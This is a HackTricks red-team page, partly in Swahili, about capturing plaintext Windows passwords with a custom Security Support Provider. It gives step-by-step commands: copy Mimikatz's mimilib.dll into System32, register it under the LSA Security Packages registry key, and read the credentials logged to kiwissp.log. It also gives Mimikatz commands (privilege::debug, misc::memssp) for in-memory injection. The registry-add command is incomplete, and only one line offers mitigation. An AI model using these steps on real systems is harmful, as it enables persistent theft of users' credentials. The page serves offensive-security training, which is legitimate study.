Custom SSP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Custom SSP

Learn what is a SSP (Security Support Provider) here. Unaweza kuunda SSP yako mwenyewe ili kukamata katika maandishi wazi nywila zinazotumika kufikia mashine.

Mimilib

Unaweza kutumia mimilib.dll binary inayotolewa na Mimikatz. Hii itarekodi ndani ya faili nywila zote katika maandiko wazi. Tupa dll katika C:\Windows\System32\ Pata orodha ya Vifurushi vya Usalama vya LSA vilivyopo:

attacker@target

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Ongeza mimilib.dll kwenye orodha ya Watoa Msaada wa Usalama (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Na baada ya kuanzisha upya, akreditivu zote zinaweza kupatikana kwa maandiko wazi katika C:\Windows\System32\kiwissp.log

Katika kumbukumbu

Unaweza pia kuingiza hii moja kwa moja katika kumbukumbu ukitumia Mimikatz (zingatia kwamba inaweza kuwa na utata kidogo/isiweze kufanya kazi):

privilege::debug
misc::memssp

This won't survive reboots.

Mitigation

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousConstrained Delegation NextDCShadow

Last updated 4 months ago

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u